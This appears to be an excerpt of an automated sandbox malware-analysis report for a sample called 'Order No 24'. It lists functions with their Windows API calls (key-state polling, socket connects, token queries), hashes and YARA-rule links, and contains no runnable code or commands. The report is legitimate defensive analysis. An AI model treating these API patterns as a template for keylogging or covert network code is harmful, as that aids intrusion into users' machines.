                                                                                                                                  • Instruction ID: f12d4596195c992b312c1df55a5801760007c0e724cb4dc6041b06f42d1e778d
                                                                                                                                  • Opcode Fuzzy Hash: 3b8a53890611cca2dee654c4715e311c2010f436b436ff49c74fbd59170350b4
                                                                                                                                  • Instruction Fuzzy Hash: DE411E35A00105EFDF05EF64C991AADBBF5FF48314B148099E90AAB3A2DB31ED01DB51
                                                                                                                                  Function 0099B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCursorPos.USER32(000000FF), ref: 0099B64F
                                                                                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 0099B66C
                                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 0099B691
                                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 0099B69F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4210589936-0
                                                                                                                                  • Opcode ID: c3f83baa425fc5d3c1fd0071dcd2ba5e6f58fea82763d92784e97f9bef5f08a1
                                                                                                                                  • Instruction ID: f6a7a8fafbd93550d49abd26436b8ce96c3df173ec389a75aa85611e7e7daf48
                                                                                                                                  • Opcode Fuzzy Hash: c3f83baa425fc5d3c1fd0071dcd2ba5e6f58fea82763d92784e97f9bef5f08a1
                                                                                                                                  • Instruction Fuzzy Hash: 5F418E31508119FBDF159FA8C944EE9BBB9FB45324F10431AF829962D0CB35AD90DFA1
                                                                                                                                  Function 009BB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 009BB369
                                                                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 009BB413
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 009BB41B
                                                                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 009BB429
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 009BB431
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3382505437-0
                                                                                                                                  • Opcode ID: c41c07be420c8253010ed0729c3b87f91299e488829f603d815e21105ef03955
                                                                                                                                  • Instruction ID: 025e88641fb9610e96f29031e6e064ee322349f2ac1b8cfce7f659cc080a8dd9
                                                                                                                                  • Opcode Fuzzy Hash: c41c07be420c8253010ed0729c3b87f91299e488829f603d815e21105ef03955
                                                                                                                                  • Instruction Fuzzy Hash: 36319F7290021DEBDB04CFA8DE8DADE7BB6FB04325F104229F925A71D1C7B09955CB90
                                                                                                                                  Function 009BDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 009BDBD7
                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009BDBF4
                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009BDC2C
                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009BDC52
                                                                                                                                  • _wcsstr.LIBCMT ref: 009BDC5C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3902887630-0
                                                                                                                                  • Opcode ID: 059a0b05a338170b8991ed56bea7030c796890e5945c3abe8200ceb61631ecac
                                                                                                                                  • Instruction ID: 4bcacdbdd1604d1510fb95b35f347c23df98bff4d84b27765bbb3e378516c885
                                                                                                                                  • Opcode Fuzzy Hash: 059a0b05a338170b8991ed56bea7030c796890e5945c3abe8200ceb61631ecac
                                                                                                                                  • Instruction Fuzzy Hash: AF212972205104BBEB159F799D49EBB7FACDF85770F108039F809CA191FAA1CC42D2A0
                                                                                                                                  Function 009BBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009BBC90
                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009BBCC2
                                                                                                                                  • __itow.LIBCMT ref: 009BBCDA
                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009BBD00
                                                                                                                                  • __itow.LIBCMT ref: 009BBD11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$__itow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3379773720-0
                                                                                                                                  • Opcode ID: ee7f9490c51df64721c1d28a7c1b7a41e139390b039bc0bfe0111d4af6c2d76e
                                                                                                                                  • Instruction ID: d6d32cd225202b5a698eb260678cb495c334d442a4fe10cf93310dd899c08739
                                                                                                                                  • Opcode Fuzzy Hash: ee7f9490c51df64721c1d28a7c1b7a41e139390b039bc0bfe0111d4af6c2d76e
                                                                                                                                  • Instruction Fuzzy Hash: 1621C9756002187FDB10AEA98D85FDE7E6DAFC9720F001424F945EB1C1DBA4C94587A1
                                                                                                                                  Function 009C6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009850E6: _wcsncpy.LIBCMT ref: 009850FA
                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,009C60C3), ref: 009C6369
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,009C60C3), ref: 009C6374
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009C60C3), ref: 009C6388
                                                                                                                                  • _wcsrchr.LIBCMT ref: 009C63AA
                                                                                                                                    • Part of subcall function 009C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009C60C3), ref: 009C63E0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3633006590-0
                                                                                                                                  • Opcode ID: e41aaefc29f42a17c73d3f15d32d3928c94e54179ab751456875b7b935a77475
                                                                                                                                  • Instruction ID: cacf813f4bfd606e86c5cdef541253b5b8062dc7a82173b70f0aa8cdb3754b0f
                                                                                                                                  • Opcode Fuzzy Hash: e41aaefc29f42a17c73d3f15d32d3928c94e54179ab751456875b7b935a77475
                                                                                                                                  • Instruction Fuzzy Hash: DB21D531D042559AEF15EBB8AC52FEA33ACEF4A3A0F10446DF045D71C1EB60D9858A67
                                                                                                                                  Function 009D8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 009DA84E
                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009D8BD3
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009D8BE2
                                                                                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 009D8BFE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3701255441-0
                                                                                                                                  • Opcode ID: 0808dc58d26d380ea530277204d7a1986b97456e10e8f48aa811144727ea9b81
                                                                                                                                  • Instruction ID: 7c4b292ce7a3bce6c5dfa2f36f78a63af232fafa12769bda1bdb5b94bebaa562
                                                                                                                                  • Opcode Fuzzy Hash: 0808dc58d26d380ea530277204d7a1986b97456e10e8f48aa811144727ea9b81
                                                                                                                                  • Instruction Fuzzy Hash: 39218172640114AFCB10EFA8CC55F7E77ADEF88710F04845AF95697392CB74E8028761
                                                                                                                                  Function 009D8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsWindow.USER32(00000000), ref: 009D8441
                                                                                                                                  • GetForegroundWindow.USER32 ref: 009D8458
                                                                                                                                  • GetDC.USER32(00000000), ref: 009D8494
                                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 009D84A0
                                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 009D84DB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4156661090-0
                                                                                                                                  • Opcode ID: d9706ecd1a31c70e7d257c245ee22ecdbdc04d56d5dafe9c28a7e73f7a7928c6
                                                                                                                                  • Instruction ID: 4346595cb9496d090c06d284934debf24a9faf906dc952b5c034e7057b91f8d6
                                                                                                                                  • Opcode Fuzzy Hash: d9706ecd1a31c70e7d257c245ee22ecdbdc04d56d5dafe9c28a7e73f7a7928c6
                                                                                                                                  • Instruction Fuzzy Hash: 97215176A00204AFD700EFA5D985BAEBBE5EF88301F04C479F85997352DB70AD41CB60
                                                                                                                                  Function 0099AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0099AFE3
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0099AFF2
                                                                                                                                  • BeginPath.GDI32(?), ref: 0099B009
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0099B033
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3225163088-0
                                                                                                                                  • Opcode ID: e0535ce4dfd11aecc95f2a9738a085a5a661989e2e085fe922fd083d0a180799
                                                                                                                                  • Instruction ID: 0407fee56f97240af4c0c4db4f2ee41a9ddbd4750d3aa1ad6e92111dd11bd63d
                                                                                                                                  • Opcode Fuzzy Hash: e0535ce4dfd11aecc95f2a9738a085a5a661989e2e085fe922fd083d0a180799
                                                                                                                                  • Instruction Fuzzy Hash: E521AFB9800309EFDB10DFD9ED48BAABB6CFB52355F15431AF525920A0D3B58883CB90
                                                                                                                                  Function 009A217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __calloc_crt.LIBCMT ref: 009A21A9
                                                                                                                                  • CreateThread.KERNEL32(?,?,009A22DF,00000000,?,?), ref: 009A21ED
                                                                                                                                  • GetLastError.KERNEL32 ref: 009A21F7
                                                                                                                                  • _free.LIBCMT ref: 009A2200
                                                                                                                                  • __dosmaperr.LIBCMT ref: 009A220B
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2664167353-0
                                                                                                                                  • Opcode ID: 2ddb5f5e772136964634dfee688ad84b704547bf704af5fe0b35bfd36f26b479
                                                                                                                                  • Instruction ID: cc628d652ebea11f75c40e0e20232923a32f54cea11cdaa1f454e2e78ed9aec6
                                                                                                                                  • Opcode Fuzzy Hash: 2ddb5f5e772136964634dfee688ad84b704547bf704af5fe0b35bfd36f26b479
                                                                                                                                  • Instruction Fuzzy Hash: B211C8331083066FDB15AFE9DC42F6B7BA8EF87770B100429FD2486151DB71D81286E1
                                                                                                                                  Function 009BABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 009BABD7
                                                                                                                                  • GetLastError.KERNEL32(?,009BA69F,?,?,?), ref: 009BABE1
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,009BA69F,?,?,?), ref: 009BABF0
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,009BA69F,?,?,?), ref: 009BABF7
                                                                                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 009BAC0E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 842720411-0
                                                                                                                                  • Opcode ID: bce71634041f8153caba6f5ceb8c85ae221ec2f4a0c4741341da4259af9bfaa4
                                                                                                                                  • Instruction ID: e13ffeb58ba7f76e61c471c4d7c33f12bfc0efa357fb45ba224b6d745f1a176c
                                                                                                                                  • Opcode Fuzzy Hash: bce71634041f8153caba6f5ceb8c85ae221ec2f4a0c4741341da4259af9bfaa4
                                                                                                                                  • Instruction Fuzzy Hash: CE013C72210208BFDB108FE9DD48DAB7FADEF8A765B100529F945C3260DA71DC82CB61
                                                                                                                                  Function 009B9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CLSIDFromProgID.OLE32 ref: 009B9ADC
                                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000), ref: 009B9AF7
                                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 009B9B05
                                                                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 009B9B15
                                                                                                                                  • CLSIDFromString.OLE32(?,?), ref: 009B9B21
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3897988419-0
                                                                                                                                  • Opcode ID: 3607b0e20a3437591594c965b418df132b5e2db3a3a77f7ba287254bd0ef8533
                                                                                                                                  • Instruction ID: ef17fe7bae4682569559db4b1774bdb429d49baf704eee42b95cd15255079f72
                                                                                                                                  • Opcode Fuzzy Hash: 3607b0e20a3437591594c965b418df132b5e2db3a3a77f7ba287254bd0ef8533
                                                                                                                                  • Instruction Fuzzy Hash: EC018F7A62022CBFDB108FD4EE44BAA7AEDEF44361F148028FA05D2210D770DD469BA0
                                                                                                                                  Function 009C7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7A74
                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009C7A82
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009C7A8A
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009C7A94
                                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                  • Opcode ID: 43e6975afc379fdf1659baed05ccecf5f79c9627c84433747eb737bae683fdf6
                                                                                                                                  • Instruction ID: 90072e661afcd169f612c522bb6e42a8a8329af3c2936b86e3f45d09f10f7d9b
                                                                                                                                  • Opcode Fuzzy Hash: 43e6975afc379fdf1659baed05ccecf5f79c9627c84433747eb737bae683fdf6
                                                                                                                                  • Instruction Fuzzy Hash: 4E010536C0461DABDF00EFE5E888AEDFB78FB18711F000559E502B2150DB3496528BA2
                                                                                                                                  Function 009BAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009BAADA
                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009BAAE4
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009BAAF3
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009BAAFA
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009BAB10
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                  • Opcode ID: 8f86130ae6a83db47fdfdc604fcc3f65073ba3f3cbf93f4ba7c58549eb438dde
                                                                                                                                  • Instruction ID: 7ab4e8404768c1693cf2ed509aeb530c2fe054de047bc889e14288a7babae9fd
                                                                                                                                  • Opcode Fuzzy Hash: 8f86130ae6a83db47fdfdc604fcc3f65073ba3f3cbf93f4ba7c58549eb438dde
                                                                                                                                  • Instruction Fuzzy Hash: 50F062762102186FEB114FE4EC88EA73B6DFF45765F000129FA56C7190CB609C43CB61
                                                                                                                                  Function 009BAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009BAA79
                                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009BAA83
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009BAA92
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009BAA99
